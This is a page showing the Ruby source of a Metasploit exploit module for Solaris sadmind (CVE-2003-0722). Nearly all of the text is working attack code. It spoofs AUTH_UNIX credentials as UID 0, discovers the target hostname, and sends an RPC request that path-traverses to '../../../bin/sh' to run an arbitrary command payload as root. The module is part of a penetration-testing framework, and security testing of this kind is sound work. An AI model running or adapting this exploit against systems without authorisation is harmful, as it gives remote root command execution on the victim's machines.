Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/solaris/sunrpc/sadmind_exec.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::SunRPC

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Solaris sadmind Command Execution',

16
        'Description' => %q{

17
          This exploit targets a weakness in the default security settings of

18
          the Sun Solstice AdminSuite distributed system administration daemon

19
          (sadmind) RPC application. This server is installed and enabled by

20
          default on most versions of the Solaris operating system.

21


22
          Vulnerable systems include Solaris 2.7, 8, and 9.

23
        },

24
        'Author' => [

25
          'vlad902 <vlad902[at]gmail.com>',

26
          'hdm',

27
          'cazz',

28
          'midnitesnake'

29
        ],

30
        'License' => MSF_LICENSE,

31
        'References' => [

32
          ['CVE', '2003-0722'],

33
          ['OSVDB', '4585'],

34
          ['BID', '8615']

35
        ],

36
        'Privileged' => true,

37
        'Platform' => %w[solaris unix],

38
        'Arch' => ARCH_CMD,

39
        'Payload' => {

40
          'Space' => 2000,

41
          'BadChars' => "\x00",

42
          'DisableNops' => true,

43
          'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,

44
          'Compat' => {

45
            'PayloadType' => 'cmd',

46
            'RequiredCmd' => 'generic perl telnet ksh'

47
          }

48
        },

49
        'Targets' => [ ['Automatic', {}], ],

50
        'DisclosureDate' => '2003-09-13',

51
        'DefaultTarget' => 0,

52
        'Notes' => {

53
          'Stability' => [CRASH_SAFE],

54
          'Reliability' => [REPEATABLE_SESSION],

55
          'SideEffects' => [IOC_IN_LOGS]

56
        }

57
      )

58
    )

59


60
    register_options([

61
      OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),

62
      OptInt.new('GID', [false, 'GID to emulate', 0]),

63
      OptInt.new('UID', [false, 'UID to emulate', 0])

64
    ])

65
  end

66


67
  def check

68
    port = sunrpc_create('udp', 100232, 10)

69
    port.nil? ? CheckCode::Safe : CheckCode::Detected

70
  ensure

71
    sunrpc_destroy unless rpcobj.nil?

72
  end

73


74
  def exploit

75
    sunrpc_create('udp', 100232, 10)

76
    sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])

77


78
    if !datastore['HOSTNAME']

79
      print_status('Attempting to determine hostname')

80
      response = sadmind_request(rand_text_alpha(rand(1..10)), 'true')

81


82
      unless response

83
        fail_with(Failure::Unreachable, 'No response')

84
      end

85


86
      match = /Security exception on host (.*)\.  USER/.match(response)

87
      unless match

88
        fail_with(Failure::Unknown, 'Unable to determine hostname')

89
      end

90


91
      hostname = match.captures[0]

92
      print_status("Found hostname: #{hostname}")

93
    else

94
      hostname = datastore['HOSTNAME']

95
    end

96


97
    sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])

98
    print_status("Sending payload (#{payload.encoded.length} bytes) ...")

99
    response = sadmind_request(hostname, payload.encoded)

100


101
    if /Security exception on host/.match(response)

102
      fail_with(Failure::Unknown, "Security exception for hostname '#{hostname}' (UID #{datastore['UID']} and GID #{datastore['GID']}).")

103
    end

104


105
    print_good('Exploit did not give us an error, this is good.')

106
    select(nil, nil, nil, 1)

107
  ensure

108
    sunrpc_destroy unless rpcobj.nil?

109
  end

110


111
  def sadmind_request(host, command)

112
    header = Rex::Encoder::XDR.encode(0) * 7

113
    header << Rex::Encoder::XDR.encode(

114
      6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,

115
      4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,

116
      host, 'system', '../../../bin/sh'

117
    )

118


119
    body =

120
      do_int('ADM_FW_VERSION', 1) +

121
      do_string('ADM_LANG', 'C') +

122
      do_string('ADM_REQUESTID', '00009:000000000:0') +

123
      do_string('ADM_CLASS', 'system') +

124
      do_string('ADM_CLASS_VERS', '2.1') +

125
      do_string('ADM_METHOD', '../../../bin/sh') +

126
      do_string('ADM_HOST', host) +

127
      do_string('ADM_CLIENT_HOST', host) +

128
      do_string('ADM_CLIENT_DOMAIN', '') +

129
      do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +

130
      do_int('ADM_FENCE', 0) +

131
      do_string('X', '-c') +

132
      do_string('Y', command) +

133
      Rex::Encoder::XDR.encode('netmgt_endofargs')

134


135
    request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body

136


137
    ret = sunrpc_call(1, request)

138
    return Rex::Encoder::XDR.decode!(ret, Integer, Integer, String)[2]

139
  end

140


141
  def do_string(str1, str2)

142
    Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)

143
  end

144


145
  def do_int(str, int)

146
    Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)

147
  end

148
end

149


150